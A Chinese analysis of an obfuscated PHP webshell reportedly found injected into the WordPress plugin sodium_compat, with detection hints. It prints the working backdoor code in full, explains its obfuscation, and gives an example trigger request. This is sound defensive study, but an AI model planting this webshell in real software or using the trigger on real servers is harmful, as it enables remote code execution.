简介
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。[1]
分析
2019年11月27日,WordPress 站点不能访问,分析之后发现 WordPress 插件 sodium_compat 被人加料,代码如下。暂时不清楚黑客是如何注入,被加料内容是一个典型的 webshell 网站后门,利用 php 的 create_function 和 base64_decode 函数,且使用了大量的字符串处理来逃避 webshell 检测。
源码
## Webshell sample exactly as recovered from the tampered sodium_compat file (code kept
## byte-for-byte; only comments are added, so the sample stays usable as an indicator).
## Every function name below is assembled at runtime from character indexes into
## $ALpmKtOl8475, and random /* ... */ comments are spliced into the middle of expressions,
## so a plain string match on "base64_decode", "create_function" or "$_REQUEST[" does not
## hit this file. Hunting for it means looking for names built from index arrays,
## strrev() applied to a literal, or simply diffing the file against the pristine release.
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
## Indexes 3,38,5,23 -> "s","o","r","t": the request parameter that carries the payload.
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
## Trigger: a request carrying a "sort" parameter. $_REQUEST is used so GET or POST both
## work (cookies too, depending on the request_order ini setting).
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
## Attacker-supplied value; it is base64-encoded PHP source (decoded below).
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
## Indexes 4,8,3,16,9,11,30,22,16,40,38,22,16 -> "base64_decode".
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
## Indexes 3,23,5,5,16,34 -> "strrev".
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
## strrev("noitcnuf_etaerc") -> "create_function"; the empty '' pieces are padding to
## break up the reversed literal for signature scanners.
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
## create_function("", base64_decode($payload)) compiles the decoded request value as the
## body of an anonymous function, i.e. an eval() of attacker-controlled source with the
## web server's privileges. create_function() was removed in PHP 8.0, so on PHP 8 this
## line is a fatal error rather than code execution (the trigger above still runs).
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
## Run the payload, then stop so nothing of the host page is rendered after it.
$E();
exit();
}
解析
## Annotated walk-through of the same sample. Code is identical to the listing above;
## each "=>" comment gives the value a variable holds after the preceding loop.
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
## $kHTiDsnt7866 => the string "sort", the request parameter used to receive the injected code
## Gate the request: only proceed when that parameter is present
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
## $EqHZGFsG5581 => the function name base64_decode
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
## $DmPqoAru8529 => the function name strrev
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
## $E => create_function (strrev of "noitcnuf_etaerc"; the '' pieces are padding)
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
## $DDebczKe7430 => the injected code as a base64-encoded value; after decoding it becomes
## the body of the anonymous function, so whatever the request carries is executed as PHP
## Example: echo phpinfo(); base64-encoded is ZWNobyBwaHBpbmZvKCk7
## A request to http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 then prints the phpinfo output; if the production server has not disabled functions such as exec and system, the consequences are severe.
## Note: create_function() was removed in PHP 8.0, so on PHP 8 this call fails with a fatal error instead of executing the payload.
$E();
exit();
}
文献引用